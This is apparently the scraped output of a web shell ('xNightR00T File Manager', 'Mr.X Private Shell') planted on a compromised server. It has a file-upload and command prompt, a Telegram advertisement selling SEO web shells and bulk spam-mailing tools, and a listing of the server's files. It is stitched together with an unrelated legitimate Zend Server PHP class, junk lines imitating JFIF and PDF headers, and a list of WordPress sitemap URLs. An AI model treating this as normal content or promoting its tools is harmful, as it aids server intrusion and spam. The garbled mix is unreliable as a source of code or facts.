xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace ZendServer\Configuration;

class Manager
{
    const OS_TYPE_NIX     = 1;
    const OS_TYPE_WINDOWS = 2;
    const OS_TYPE_IBMI    = 3;
    const OS_TYPE_MAC     = 4;

    /**
     * build => marketing name
     */
    private static $windowsOsTable = array(528 => 'Windows NT',
        807 => 'Windows NT',
        1057 => 'Windows NT',
        1381 => 'Windows NT',
        2195 => 'Windows 2000',
        2600 => 'Windows XP',
        3790 => 'Windows XP or Windows Server 2003',
        6000 => 'Windows Vista',
        6001 => 'Windows Vista or Windows Server 2008',
        6002 => 'Windows Vista or Windows Server 2008');

     /**
     * @return boolean
     */
     static public function isIIS()
    {
         //return true;
         $webserver = $_SERVER['SERVER_SOFTWARE'];
         return stripos($webserver, 'iis') !== false;
    }

    /**
     * @return integer
     */
    public function getOsType()
    {
        if (DIRECTORY_SEPARATOR == '\\') {
            return self::OS_TYPE_WINDOWS;
        } else {
            if (in_array(PHP_OS, array('AIX', 'OS400'))) {
                return self::OS_TYPE_IBMI;
            } elseif (PHP_OS == 'Darwin') {
                return self::OS_TYPE_MAC;
            } else {
                return self::OS_TYPE_NIX;
            }
        }
    }

    /**
     * @return integer
     */
    public function getOsName()
    {
        $osType = $this->getOsType();
        switch ($osType) {
            case self::OS_TYPE_WINDOWS:
                return $this->getWindowsOsName();
                break;
            case self::OS_TYPE_IBMI:
                return 'Ibmi';
                break;
            case self::OS_TYPE_MAC:
                return 'Mac';
                break;
            case self::OS_TYPE_NIX:
                return 'Linux';
                break;
        }
    }

    /**
     * @return string
     */
    public function getPhpIniFileLocation()
    {
        return trim(getCfgVar('cfg_file_path'));
    }

    public function getDefaultListenPort()
    {
        $osType = $this->getOsType();
        switch ($osType) {
            case self::OS_TYPE_IBMI:
            case self::OS_TYPE_MAC:
                return 10088;

            case self::OS_TYPE_NIX:
            case self::OS_TYPE_WINDOWS:
            default:
                return 80;
        }
    }

    /**
     * @return string
     */
    private function getWindowsOsName()
    {
        list(, $build) = explode(" ", php_uname('v'));
        if (array_key_exists($build, self::$windowsOsTable)) {
            return self::$windowsOsTable[$build];
        }
        return 'Windows';
    }
}

Filemanager

Name Type Size Permission Actions
Directives Folder 0755
Ui Folder 0755
Container.php File 10.44 KB 0644
Manager.php File 2.6 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml